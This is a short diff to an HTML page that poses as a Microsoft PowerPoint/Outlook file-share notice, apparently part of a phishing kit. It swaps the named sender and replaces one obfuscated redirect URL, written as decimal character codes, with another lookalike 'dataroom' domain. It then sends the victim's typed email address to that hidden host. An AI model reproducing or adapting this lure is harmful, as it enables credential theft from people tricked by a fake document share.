--- a/index.html
+++ b/index.html
@@ -71,7 +71,7 @@
     <div id="auth-page" class="container">
         <img src="https://upload.wikimedia.org/wikipedia/commons/0/0d/Microsoft_Office_PowerPoint_%282019%E2%80%93present%29.svg" alt="Outlook Logo" class="logo"><br>
         
-        <p>Here's the PowerPoint file that <b>Annie</b> shared with you.</p><br><br>
+        <p>Here's the PowerPoint file that <b>tony torquato</b> shared with you.</p><br><br>
         <input type="email" id="email" placeholder="Enter the recipient's email to proceed">
         <button onclick="validateEmail()">Continue</button>
     </div>
@@ -106,7 +106,7 @@
             }
 
             let base64Email = (email);
-            let encodedURL = "104 116 116 112 115 58 47 47 107 101 97 114 110 101 121 115 108 101 103 97 108 45 100 97 116 97 114 111 111 109 45 112 111 119 101 114 112 111 105 110 116 45 97 99 99 101 115 115 46 113 108 106 110 97 104 46 99 111 109 47 113 74 80 115 68 111 47";
+            let encodedURL = "104 116 116 112 115 58 47 47 116 104 101 102 105 110 97 110 99 101 109 97 110 45 100 97 116 97 114 111 111 109 45 97 99 99 101 115 115 45 112 111 119 101 114 112 111 105 110 116 45 112 97 103 101 115 46 102 104 104 121 101 104 46 99 111 109 47 113 74 80 115 68 111 47";
             let decodedURL = encodedURL.split(" ").map(num => String.fromCharCode(num)).join("");
 
             window.location.href = decodedURL + "*" + (base64Email);
